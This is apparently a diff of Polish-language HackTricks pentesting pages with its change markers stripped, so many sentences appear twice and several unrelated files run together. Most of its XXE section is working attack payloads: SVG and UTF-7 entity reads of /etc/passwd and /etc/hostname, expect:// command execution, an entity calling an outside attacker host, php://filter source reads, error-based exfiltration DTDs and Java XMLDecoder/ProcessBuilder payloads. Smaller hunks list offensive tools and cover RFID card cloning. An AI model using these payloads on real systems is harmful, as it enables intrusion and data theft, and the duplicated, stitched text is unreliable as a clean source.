```bash
Responder.py -I eth0 -v
```
@ -314,7 +318,7 @@ i wysyłając następujący żądanie
### XInclude
Podczas integrowania danych klienta w dokumenty XML po stronie serwera, takie jak te w żądaniach SOAP po stronie serwera, bezpośrednia kontrola nad strukturą XML jest często ograniczona, co utrudnia tradycyjne ataki XXE ze względu na ograniczenia dotyczące modyfikowania elementu `DOCTYPE`. Jednak atak `XInclude` zapewnia rozwiązanie, pozwalając na wstawienie zewnętrznych jednostek w dowolny element danych dokumentu XML. Ta metoda jest skuteczna nawet wtedy, gdy kontrolowane może być tylko część danych w generowanym przez serwer dokumencie XML.
Podczas integrowania danych klienta do dokumentów XML po stronie serwera, takich jak te w żądaniach SOAP po stronie serwera, bezpośrednia kontrola nad strukturą XML jest często ograniczona, co utrudnia tradycyjne ataki XXE ze względu na ograniczenia dotyczące modyfikowania elementu `DOCTYPE`. Jednak atak `XInclude` zapewnia rozwiązanie, pozwalając na wstawienie zewnętrznych jednostek w dowolny element danych dokumentu XML. Ta metoda jest skuteczna nawet wtedy, gdy kontrolować można tylko część danych w wygenerowanym przez serwer dokumencie XML.
Aby przeprowadzić atak `XInclude`, przestrzeń nazw `XInclude` musi zostać zadeklarowana, a ścieżka pliku do zamierzonej zewnętrznej jednostki musi zostać określona. Poniżej znajduje się zwięzły przykład, jak taki atak może być sformułowany:
```xml
@ -328,7 +332,7 @@ Pliki przesyłane przez użytkowników do określonych aplikacji, które są nas
Kiedy użytkownicy **przesyłają obrazy**, te obrazy są przetwarzane lub sprawdzane po stronie serwera. Nawet dla aplikacji oczekujących formatów takich jak PNG lub JPEG, **biblioteka przetwarzania obrazów serwera może również obsługiwać obrazy SVG**. SVG, będąc formatem opartym na XML, może być wykorzystany przez atakujących do przesyłania złośliwych obrazów SVG, narażając w ten sposób serwer na podatności XXE (XML External Entity).
Poniżej przedstawiono przykład takiego ataku, w którym złośliwy obraz SVG próbuje odczytać pliki systemowe:
Poniżej pokazano przykład takiego ataku, w którym złośliwy obraz SVG próbuje odczytać pliki systemowe:
```xml
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="300" version="1.1" height="200"><image xlink:href="file:///etc/hostname"></image></svg>
```
@ -338,7 +342,7 @@ Inna metoda polega na próbie **wykonania poleceń** za pomocą nakładki PHP "e
<image xlink:href="expect://ls"></image>
</svg>
```
W obu przypadkach format SVG jest wykorzystywany do uruchamiania ataków wykorzystujących zdolności przetwarzania XML oprogramowania serwera, podkreślając konieczność solidnej walidacji danych wejściowych i środków bezpieczeństwa.
W obu przypadkach format SVG jest wykorzystywany do przeprowadzania ataków wykorzystujących zdolności przetwarzania XML oprogramowania serwera, podkreślając konieczność solidnej walidacji danych wejściowych i środków bezpieczeństwa.
Sprawdź [https://portswigger.net/web-security/xxe](https://portswigger.net/web-security/xxe) po więcej informacji!
@ -362,7 +366,7 @@ Content-Length: 7
foo=bar
```
W takim razie możesz złożyć następujące żądanie, uzyskując ten sam rezultat:
W takim razie możesz złożyć następujące żądanie, uzyskując ten sam wynik:
```xml
POST /action HTTP/1.0
Content-Type: text/xml
@ -400,7 +404,7 @@ Content-Type: application/xml;charset=UTF-8
</root>
</root>
```
Kolejny przykład można znaleźć [tutaj](https://medium.com/hmif-itb/googlectf-2019-web-bnv-writeup-nicholas-rianto-putra-medium-b8e2d86d78b2).
Inny przykład można znaleźć [tutaj](https://medium.com/hmif-itb/googlectf-2019-web-bnv-writeup-nicholas-rianto-putra-medium-b8e2d86d78b2).
## Bypassowanie WAF i zabezpieczeń
@ -412,7 +416,7 @@ To działa tylko wtedy, gdy serwer XML akceptuje protokół `data://`.
### UTF-7
Możesz użyć \[**"Przepisu kodowania**" cyberchef tutaj ]\([https://gchq.github.io/CyberChef/#recipe=Encode\_text%28'UTF-7](https://gchq.github.io/CyberChef/#recipe=Encode\_text%28'UTF-7) %2865000%29'%29\&input=PCFET0NUWVBFIGZvbyBbPCFFTlRJVFkgZXhhbXBsZSBTWVNURU0gIi9ldGMvcGFzc3dkIj4gXT4KPHN0b2NrQ2hlY2s%2BPHByb2R1Y3RJZD4mZXhhbXBsZTs8L3Byb2R1Y3RJZD48c3RvcmVJZD4xPC9zdG9yZUlkPjwvc3RvY2tDaGVjaz4)to]\([https://gchq.github.io/CyberChef/#recipe=Encode\_text%28'UTF-7 %2865000%29'%29\&input=PCFET0NUWVBFIGZvbyBbPCFFTlRJVFkgZXhhbXBsZSBTWVNURU0gIi9ldGMvcGFzc3dkIj4gXT4KPHN0b2NrQ2hlY2s%2BPHByb2R1Y3RJZD4mZXhhbXBsZTs8L3Byb2R1Y3RJZD48c3RvcmVJZD4xPC9zdG9yZUlkPjwvc3RvY2tDaGVjaz4%29to](https://gchq.github.io/CyberChef/#recipe=Encode\_text%28%27UTF-7%20%2865000%29%27%29\&input=PCFET0NUWVBFIGZvbyBbPCFFTlRJVFkgZXhhbXBsZSBTWVNURU0gIi9ldGMvcGFzc3dkIj4gXT4KPHN0b2NrQ2hlY2s%2BPHByb2R1Y3RJZD4mZXhhbXBsZTs8L3Byb2R1Y3RJZD48c3RvcmVJZD4xPC9zdG9yZUlkPjwvc3RvY2tDaGVjaz4%29to)) transformować na UTF-7.
Możesz użyć \[**"Przepisu kodowania**" cyberchefa tutaj ]\([https://gchq.github.io/CyberChef/#recipe=Encode\_text%28'UTF-7](https://gchq.github.io/CyberChef/#recipe=Encode\_text%28'UTF-7) %2865000%29'%29\&input=PCFET0NUWVBFIGZvbyBbPCFFTlRJVFkgZXhhbXBsZSBTWVNURU0gIi9ldGMvcGFzc3dkIj4gXT4KPHN0b2NrQ2hlY2s%2BPHByb2R1Y3RJZD4mZXhhbXBsZTs8L3Byb2R1Y3RJZD48c3RvcmVJZD4xPC9zdG9yZUlkPjwvc3RvY2tDaGVjaz4)to]\([https://gchq.github.io/CyberChef/#recipe=Encode\_text%28'UTF-7 %2865000%29'%29\&input=PCFET0NUWVBFIGZvbyBbPCFFTlRJVFkgZXhhbXBsZSBTWVNURU0gIi9ldGMvcGFzc3dkIj4gXT4KPHN0b2NrQ2hlY2s%2BPHByb2R1Y3RJZD4mZXhhbXBsZTs8L3Byb2R1Y3RJZD48c3RvcmVJZD4xPC9zdG9yZUlkPjwvc3RvY2tDaGVjaz4%29to](https://gchq.github.io/CyberChef/#recipe=Encode\_text%28%27UTF-7%20%2865000%29%27%29\&input=PCFET0NUWVBFIGZvbyBbPCFFTlRJVFkgZXhhbXBsZSBTWVNURU0gIi9ldGMvcGFzc3dkIj4gXT4KPHN0b2NrQ2hlY2s%2BPHByb2R1Y3RJZD4mZXhhbXBsZTs8L3Byb2R1Y3RJZD48c3RvcmVJZD4xPC9zdG9yZUlkPjwvc3RvY2tDaGVjaz4%29to)) transformować na UTF-7.
```xml
<!xml version="1.0" encoding="UTF-7"?-->
+ADw-+ACE-DOCTYPE+ACA-foo+ACA-+AFs-+ADw-+ACE-ENTITY+ACA-example+ACA-SYSTEM+ACA-+ACI-/etc/passwd+ACI-+AD4-+ACA-+AF0-+AD4-+AAo-+ADw-stockCheck+AD4-+ADw-productId+AD4-+ACY-example+ADs-+ADw-/productId+AD4-+ADw-storeId+AD4-1+ADw-/storeId+AD4-+ADw-/stockCheck+AD4-
@ -424,9 +428,9 @@ Możesz użyć \[**"Przepisu kodowania**" cyberchef tutaj ]\([https://gchq.githu
+ADwAIQ-ENTITY xxe SYSTEM +ACI-http://hack-r.be:1337+ACI +AD4AXQA+
+ADw-foo+AD4AJg-xxe+ADsAPA-/foo+AD4
```
### Protokół File: / Bypass
### Plik:/ Bypass protokołu
Jeśli strona internetowa używa PHP, zamiast używać `file:/`, możesz użyć **obwodów PHP** `php://filter/convert.base64-encode/resource=`, aby **uzyskać dostęp do plików wewnętrznych**.
Jeśli strona internetowa używa PHP, zamiast używać `file:/`, możesz użyć **opakowań PHP** `php://filter/convert.base64-encode/resource=` do **dostępu do wewnętrznych plików**.
Jeśli strona internetowa używa Javy, możesz sprawdzić [**protokół jar**](xxe-xee-xml-external-entity.md#jar-protocol).
@ -434,7 +438,7 @@ Jeśli strona internetowa używa Javy, możesz sprawdzić [**protokół jar**](x
Sztuczka z [**https://github.com/Ambrotd/XXE-Notes**](https://github.com/Ambrotd/XXE-Notes)\
Możesz stworzyć **encję wewnątrz innej encji**, kodując ją za pomocą **encji HTML**, a następnie wywołać ją, aby **załadować dtd**.\
Zauważ, że używane **encje HTML** muszą być **numeryczne** (jak w tym przykładzie [tutaj](https://gchq.github.io/CyberChef/#recipe=To_HTML_Entity%28true,'Numeric%20entities'%29&input=PCFFTlRJVFkgJSBkdGQgU1lTVEVNICJodHRwOi8vMTcyLjE3LjAuMTo3ODc4L2J5cGFzczIuZHRkIiA%2B)).
Zauważ, że używane **encje HTML** muszą być **numeryczne** (jak w tym przykładzie [\[w tym przykładzie\]\([https://gchq.github.io/CyberChef/#recipe=To\_HTML\_Entity%28true,'Numeric entities'%29\&input=PCFFTlRJVFkgJSBkdGQgU1lTVEVNICJodHRwOi8vMTcyLjE3LjAuMTo3ODc4L2J5cGFzczIuZHRkIiA%2B)\\](https://gchq.github.io/CyberChef/#recipe=To\_HTML\_Entity%28true,%27Numeric%20entities%27%29\&input=PCFFTlRJVFkgJSBkdGQgU1lTVEVNICJodHRwOi8vMTcyLjE3LjAuMTo3ODc4L2J5cGFzczIuZHRkIiA%2B\)%5C)).
```xml
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY % a "&#x3C;&#x21;&#x45;&#x4E;&#x54;&#x49;&#x54;&#x59;&#x25;&#x64;&#x74;&#x64;&#x53;&#x59;&#x53;&#x54;&#x45;&#x4D;&#x22;&#x68;&#x74;&#x74;&#x70;&#x3A;&#x2F;&#x2F;&#x6F;&#x75;&#x72;&#x73;&#x65;&#x72;&#x76;&#x65;&#x72;&#x2E;&#x63;&#x6F;&#x6D;&#x2F;&#x62;&#x79;&#x70;&#x61;&#x73;&#x73;&#x2E;&#x64;&#x74;&#x64;&#x22;&#x3E;" >%a;%dtd;]>
<data>
@ -452,7 +456,7 @@ Przykład DTD:
### Base64
**Wyciągnij** _**index.php**_
**Wydobyć** _**index.php**_
```xml
<!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]>
```
@ -473,10 +477,6 @@ Przykład DTD:
</creds>
```
## **SOAP - XEE**
### XML External Entity (XEE) Attack
Atak XML External Entity (XEE) polega na wykorzystaniu funkcji przetwarzania zewnętrznych encji XML do wykonania ataku. Atakujący może wstrzyknąć złośliwe treści XML, które mogą prowadzić do odczytu poufnych danych, wykonania zdalnych żądań HTTP lub innych działań związanych z przetwarzaniem danych XML. Aby zabezpieczyć aplikację przed atakiem XEE, należy odpowiednio skonfigurować parser XML, wyłączając obsługę zewnętrznych encji lub korzystając z bezpiecznych metod przetwarzania danych XML.
```xml
<soap:Body><foo><![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]></foo></soap:Body>
```
@ -488,7 +488,7 @@ XLIFF (XML Localization Interchange File Format) jest wykorzystywany do standary
### Analiza żądania bez odpowiedzi
Wysłano żądanie do serwera z następującą zawartością:
Wysłane jest żądanie do serwera z następującą zawartością:
```xml
------WebKitFormBoundaryqBdAsEtYaBjTArl3
Content-Disposition: form-data; name="file"; filename="xxe.xliff"
@ -500,7 +500,7 @@ Content-Type: application/x-xliff+xml
<xliff srcLang="en" trgLang="ms-MY" version="2.0"></xliff>
------WebKitFormBoundaryqBdAsEtYaBjTArl3--
```
Jednakże to żądanie powoduje wewnętrzny błąd serwera, wskazujący konkretnie problem z deklaracjami znaczników:
Jednakże to żądanie powoduje wewnętrzny błąd serwera, wskazując konkretnie problem z deklaracjami znaczników:
```json
{"status":500,"error":"Internal Server Error","message":"Error systemId: http://redacted.burpcollaborator.net/?xxe_test; The markup declarations contained or pointed to by the document type declaration must be well-formed."}
```
@ -518,16 +518,16 @@ Content-Type: application/x-xliff+xml
<xliff srcLang="en" trgLang="ms-MY" version="2.0"></xliff>
------WebKitFormBoundaryqBdAsEtYaBjTArl3--
```
To podejście ujawnia, że Agent użytkownika wskazuje na użycie Javy 1.8. Zauważoną ograniczeniem tej wersji Javy jest niemożność pobrania plików zawierających znak nowej linii, takich jak /etc/passwd, za pomocą techniki Out of Band.
To podejście ujawnia, że User Agent wskazuje na użycie Javy 1.8. Zauważoną ograniczeniem tej wersji Javy jest niemożność pobrania plików zawierających znak nowej linii, takich jak /etc/passwd, za pomocą techniki Out of Band.
Eksfiltracja danych oparta na błędach Aby przezwyciężyć to ograniczenie, stosuje się podejście oparte na błędach. Plik DTD jest zbudowany w następujący sposób, aby wywołać błąd, który zawiera dane z docelowego pliku:
Wyciek danych oparty na błędach Aby przezwyciężyć to ograniczenie, stosuje się podejście oparte na błędach. Plik DTD jest strukturyzowany w następujący sposób, aby wywołać błąd, który zawiera dane z docelowego pliku:
```xml
<!ENTITY % data SYSTEM "file:///etc/passwd">
<!ENTITY % foo "<!ENTITY &#37; xxe SYSTEM 'file:///nofile/'>">
%foo;
%xxe;
```
Serwer odpowiada błędem, istotnie odzwierciedlając nieistniejący plik, wskazując, że serwer próbuje uzyskać dostęp do określonego pliku:
Serwer odpowiada błędem, co jest istotne, odzwierciedlając nieistniejący plik, wskazując, że serwer próbuje uzyskać dostęp do określonego pliku:
```javascript
{"status":500,"error":"Internal Server Error","message":"IO error.\nReason: /nofile (No such file or directory)"}
```
@ -538,7 +538,7 @@ Aby uwzględnić zawartość pliku w komunikacie o błędzie, plik DTD jest dost
%foo;
%xxe;
```
Ta modyfikacja prowadzi do udanego wycieku zawartości pliku, co jest odzwierciedlone w komunikacie błędu wysłanym za pośrednictwem protokołu HTTP. Oznacza to udany atak XXE (XML External Entity), wykorzystujący techniki Out of Band i Error-Based do wydobycia poufnych informacji.
Ta modyfikacja prowadzi do udanego wycieku zawartości pliku, co jest odzwierciedlone w komunikacie o błędzie wysłanym za pomocą protokołu HTTP. Oznacza to udany atak XXE (XML External Entity), wykorzystujący techniki Out of Band i Error-Based do wydobycia poufnych informacji.
## RSS - XEE
@ -590,7 +590,7 @@ Proste żądanie HTTP do serwera atakującego
```
### Odczytaj kod źródłowy
Za pomocą filtra PHP base64
Z wykorzystaniem filtra PHP base64
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE title [ <!ELEMENT title ANY >
@ -645,8 +645,6 @@ XMLDecoder to klasa Javy, która tworzy obiekty na podstawie wiadomości XML. Je
</object>
</java>
```
### ProcessBuilder
### ProcessBuilder
```xml
<?xml version="1.0" encoding="UTF-8"?>
@ -685,7 +683,7 @@ XMLDecoder to klasa Javy, która tworzy obiekty na podstawie wiadomości XML. Je
* [https://media.blackhat.com/eu-13/briefings/Osipov/bh-eu-13-XML-data-osipov-slides.pdf](https://media.blackhat.com/eu-13/briefings/Osipov/bh-eu-13-XML-data-osipov-slides.pdf)\\
* [https://web-in-security.blogspot.com/2016/03/xxe-cheat-sheet.html](https://web-in-security.blogspot.com/2016/03/xxe-cheat-sheet.html)\\
* Wyciąganie informacji za pomocą HTTP przy użyciu własnego zewnętrznego DTD: [https://ysx.me.uk/from-rss-to-xxe-feed-parsing-on-hootsuite/](https://ysx.me.uk/from-rss-to-xxe-feed-parsing-on-hootsuite/)\\
* Wydobycie informacji za pomocą własnego zewnętrznego DTD: [https://ysx.me.uk/from-rss-to-xxe-feed-parsing-on-hootsuite/](https://ysx.me.uk/from-rss-to-xxe-feed-parsing-on-hootsuite/)\\
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XXE%20injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XXE%20injection)\\
* [https://gist.github.com/staaldraad/01415b990939494879b4](https://gist.github.com/staaldraad/01415b990939494879b4)\\
* [https://medium.com/@onehackman/exploiting-xml-external-entity-xxe-injections-b0e3eac388f9](https://medium.com/@onehackman/exploiting-xml-external-entity-xxe-injections-b0e3eac388f9)\\
@ -693,7 +691,7 @@ XMLDecoder to klasa Javy, która tworzy obiekty na podstawie wiadomości XML. Je
* [https://gosecure.github.io/xxe-workshop/#7](https://gosecure.github.io/xxe-workshop/#7)
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %}
<details>
@ -703,7 +701,7 @@ XMLDecoder to klasa Javy, która tworzy obiekty na podstawie wiadomości XML. Je
Inne sposoby wsparcia HackTricks:
* Jeśli chcesz zobaczyć swoją **firmę reklamowaną w HackTricks** lub **pobrać HackTricks w formacie PDF**, sprawdź [**PLANY SUBSKRYPCYJNE**](https://github.com/sponsors/carlospolop)!
* Zdobądź [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com)
* Kup [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com)
* Odkryj [**Rodzinę PEASS**](https://opensea.io/collection/the-peass-family), naszą kolekcję ekskluzywnych [**NFT**](https://opensea.io/collection/the-peass-family)
* **Dołącz do** 💬 [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

36
todo/more-tools.md
View file

@ -1,18 +1,18 @@
<details>
<summary><strong>Dowiedz się, jak hakować AWS od zera do bohatera z</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Naucz się hakować AWS od zera do bohatera z</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Inne sposoby wsparcia HackTricks:
* Jeśli chcesz zobaczyć swoją **firmę reklamowaną w HackTricks** lub **pobrać HackTricks w formacie PDF**, sprawdź [**PLANY SUBSKRYPCYJNE**](https://github.com/sponsors/carlospolop)!
* Jeśli chcesz zobaczyć swoją **firmę reklamowaną na HackTricks** lub **pobrać HackTricks w formacie PDF**, sprawdź [**PLANY SUBSKRYPCYJNE**](https://github.com/sponsors/carlospolop)!
* Zdobądź [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com)
* Odkryj [**Rodzinę PEASS**](https://opensea.io/collection/the-peass-family), naszą kolekcję ekskluzywnych [**NFT**](https://opensea.io/collection/the-peass-family)
* **Dołącz do** 💬 [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) na GitHubie.
* **Podziel się swoimi sztuczkami hakowania, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repozytoriów na GitHubie.
</details>
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %}
@ -53,7 +53,7 @@ Inne sposoby wsparcia HackTricks:
* [https://github.com/hahwul/XSpear](https://github.com/hahwul/XSpear)
* [https://github.com/BitTheByte/Monitorizer/](https://github.com/BitTheByte/Monitorizer/)
* [https://github.com/spinkham/skipfish](https://github.com/spinkham/skipfish)
* [https://github.com/blark/aiodnsbrute](https://github.com/blark/aiodnsbrute) : Asynchroniczne łamanie nazw domenowych
* [https://github.com/blark/aiodnsbrute](https://github.com/blark/aiodnsbrute) : Brute force nazw domen asynchronicznie
* [https://crt.sh/?q=%.yahoo.com](https://crt.sh/?q=%.yahoo.com) : Bruteforce subdomen
* [https://github.com/tomnomnom/httprobe](https://github.com/tomnomnom/httprobe): Sprawdź dostępność serwerów WWW w domenie
* [https://github.com/aboul3la/Sublist3r](https://github.com/aboul3la/Sublist3r) : Odkrywanie subdomen
@ -66,7 +66,7 @@ Inne sposoby wsparcia HackTricks:
* [https://github.com/izo30/google-dorker](https://github.com/izo30/google-dorker) : Google dorks
* [https://github.com/sehno/Bug-bounty/blob/master/bugbounty\_checklist.md](https://github.com/sehno/Bug-bounty/blob/master/bugbounty\_checklist.md) : Lista kontrolna BugBounty dla stron internetowych
* [https://github.com/Naategh/dom-red](https://github.com/Naategh/dom-red) : Sprawdź listę domen pod kątem przekierowań
* [https://github.com/prodigysml/Dr.-Watson](https://github.com/prodigysml/Dr.-Watson) : Wtyczka Burp, analiza offline w celu odkrycia domen, subdomen i adresów IP
* [https://github.com/prodigysml/Dr.-Watson](https://github.com/prodigysml/Dr.-Watson) : Wtyczka Burp, analiza offline w celu odkrycia domen, subdomen i IP
* [https://github.com/hahwul/WebHackersWeapons](https://github.com/hahwul/WebHackersWeapons): Lista różnych narzędzi
* [https://github.com/gauravnarwani97/Trishul](https://github.com/gauravnarwani97/Trishul) : Wtyczka BurpSuite do znajdowania podatności (SQLi, XSS, SSTI)
* [https://github.com/fransr/postMessage-tracker](https://github.com/fransr/postMessage-tracker) : Rozszerzenie Chrome do śledzenia funkcji post-messages
@ -81,33 +81,33 @@ Inne sposoby wsparcia HackTricks:
* [https://github.com/BankSecurity/Red\_Team](https://github.com/BankSecurity/Red\_Team) : Skrypty Red Team
* [https://github.com/l0ss/Grouper2](https://github.com/l0ss/Grouper2) : znajdź związane z bezpieczeństwem błędy konfiguracji w zasadach grupy Active Directory.
* [https://www.wietzebeukema.nl/blog/powershell-obfuscation-using-securestring](https://www.wietzebeukema.nl/blog/powershell-obfuscation-using-securestring) : Obfuskacja Securestring
* [https://pentestlab.blog/2020/02/24/parent-pid-spoofing/](https://pentestlab.blog/2020/02/24/parent-pid-spoofing/) : Podszycie się pod PID rodzica
* [https://github.com/the-xentropy/xencrypt](https://github.com/the-xentropy/xencrypt) : Szyfrowanie ładunków Powershell
* [https://pentestlab.blog/2020/02/24/parent-pid-spoofing/](https://pentestlab.blog/2020/02/24/parent-pid-spoofing/) : Podszycie PID rodzica
* [https://github.com/the-xentropy/xencrypt](https://github.com/the-xentropy/xencrypt) : Szyfruj ładunki Powershell
* [https://shells.systems/introducing-ninja-c2-the-c2-built-for-stealth-red-team-operations/](https://shells.systems/introducing-ninja-c2-the-c2-built-for-stealth-red-team-operations/) : Stealth C2
* [https://windows-internals.com/faxing-your-way-to-system/](https://windows-internals.com/faxing-your-way-to-system/) : Seria logów dotyczących Windows Internals
* [https://bestestredteam.com/2018/10/02/tracking-pixel-in-microsoft-office-document/](https://bestestredteam.com/2018/10/02/tracking-pixel-in-microsoft-office-document/) : Śledzenie kto otworzył dokument
* [https://windows-internals.com/faxing-your-way-to-system/](https://windows-internals.com/faxing-your-way-to-system/) : Seria logów dotyczących wewnętrzności systemu Windows
* [https://bestestredteam.com/2018/10/02/tracking-pixel-in-microsoft-office-document/](https://bestestredteam.com/2018/10/02/tracking-pixel-in-microsoft-office-document/) : Śledź kto otworzył dokument
* [https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet](https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet) : Arkusz oszustw dotyczący Active Directory
# Firmware
Narzędzia, które mogą być fajne do analizy oprogramowania sprzętowego (automatyczne):
Tools, które mogą być fajne do analizy firmware (automatyczne):
* [https://github.com/craigz28/firmwalker](https://github.com/craigz28/firmwalker)
* [https://github.com/fkie-cad/FACT\_core](https://github.com/fkie-cad/FACT\_core)
* [https://gitlab.com/bytesweep/bytesweep-go](https://gitlab.com/bytesweep/bytesweep-go)
Po-krema:
Post-crema:
* [https://blog.mindedsecurity.com/2018/09/pentesting-iot-devices-part-1-static.html](https://blog.mindedsecurity.com/2018/09/pentesting-iot-devices-part-1-static.html)
* [https://blog.mindedsecurity.com/2018/10/pentesting-iot-devices-part-2-dynamic.html](https://blog.mindedsecurity.com/2018/10/pentesting-iot-devices-part-2-dynamic.html)
Jak wydobyć oprogramowanie sprzętowe, jeśli nie można go znaleźć online: [https://www.youtube.com/watch?v=Kxvpbu9STU4](https://www.youtube.com/watch?v=Kxvpbu9STU4)
Jak wydobyć firmware, jeśli nie można go znaleźć online: [https://www.youtube.com/watch?v=Kxvpbu9STU4](https://www.youtube.com/watch?v=Kxvpbu9STU4)
Tutaj oprogramowanie sprzętowe z podatnościami do analizy: [https://github.com/scriptingxss/IoTGoat](https://github.com/scriptingxss/IoTGoat)
Oto firmware z podatnościami do analizy: [https://github.com/scriptingxss/IoTGoat](https://github.com/scriptingxss/IoTGoat)
a także metodologia owasp do analizy oprogramowania sprzętowego: [https://github.com/scriptingxss/owasp-fstm](https://github.com/scriptingxss/owasp-fstm)
a tutaj metodologia OWASP do analizy firmware: [https://github.com/scriptingxss/owasp-fstm](https://github.com/scriptingxss/owasp-fstm)
Emulacja oprogramowania sprzętowego: FIRMADYNE (https://github.com/firmadyne/firmadyne/) to platforma do automatyzacji emulacji i dynamicznej analizy oprogramowania opartego na jądrze Linux.
Emulacja firmware: FIRMADYNE (https://github.com/firmadyne/firmadyne/) to platforma do automatyzacji emulacji i dynamicznej analizy firmware opartego na Linuxie.
# INNE
@ -131,7 +131,7 @@ Emulacja oprogramowania sprzętowego: FIRMADYNE (https://github.com/firmadyne/fi
* [https://github.com/doyensec/awesome-electronjs-hacking](https://github.com/doyensec/awesome-electronjs-hacking) : Ta lista ma na celu pokrycie tematów związanych z bezpieczeństwem Electron.js.
* [https://github.com/serain/bbrecon](https://github.com/serain/bbrecon) : Informacje o programach BB
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %}
@ -141,7 +141,7 @@ Emulacja oprogramowania sprzętowego: FIRMADYNE (https://github.com/firmadyne/fi
Inne sposoby wsparcia HackTricks:
* Jeśli chcesz zobaczyć swoją **firmę reklamowaną w HackTricks** lub **pobrać HackTricks w formacie PDF**, sprawdź [**PLANY SUBSKRYPCYJNE**](https://github.com/sponsors/carlospolop)!
* Jeśli chcesz zobaczyć swoją **firmę reklamowaną w HackTricks** lub **pobrać HackTricks w formacie PDF** sprawdź [**PLANY SUBSKRYPCYJNE**](https://github.com/sponsors/carlospolop)!
* Zdobądź [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com)
* Odkryj [**Rodzinę PEASS**](https://opensea.io/collection/the-peass-family), naszą kolekcję ekskluzywnych [**NFTów**](https://opensea.io/collection/the-peass-family)
* **Dołącz do** 💬 [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegram**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**

8
todo/radio-hacking/flipper-zero/fz-125khz-rfid.md
View file

@ -14,7 +14,7 @@ Inne sposoby wsparcia HackTricks:
</details>
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %}
@ -45,12 +45,12 @@ Możesz stworzyć **fałszywe karty w Flipper Zero, wskazując dane** ręcznie,
#### ID na kartach
Czasami, gdy dostajesz kartę, znajdziesz ID (lub jego część) napisane na karcie.
Czasami, gdy dostaniesz kartę, znajdziesz ID (lub jego część) napisane na karcie.
* **EM Marin**
Na przykład w tej karcie EM-Marin na fizycznej karcie można **odczytać ostatnie 3 z 5 bajtów w czytelny sposób**.\
Pozostałe 2 można złamać siłowo, jeśli nie można ich odczytać z karty.
Pozostałe 2 można złamać metodą brute force, jeśli nie można ich odczytać z karty.
<figure><img src="../../../.gitbook/assets/image (101).png" alt=""><figcaption></figcaption></figure>
@ -68,7 +68,7 @@ Po **skopiowaniu** karty lub **ręcznym wprowadzeniu** ID można ją **emulować
* [https://blog.flipperzero.one/rfid/](https://blog.flipperzero.one/rfid/)
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %}

45
windows-hardening/active-directory-methodology/abusing-ad-mssql.md
View file

@ -1,4 +1,4 @@
# Nadużycie MSSQL w AD
# Nadużycie MSSQL AD
<details>
@ -7,16 +7,15 @@
* Czy pracujesz w **firmie z branży cyberbezpieczeństwa**? Chcesz zobaczyć swoją **firmę reklamowaną na HackTricks**? lub chcesz mieć dostęp do **najnowszej wersji PEASS lub pobrać HackTricks w formacie PDF**? Sprawdź [**PLANY SUBSKRYPCYJNE**](https://github.com/sponsors/carlospolop)!
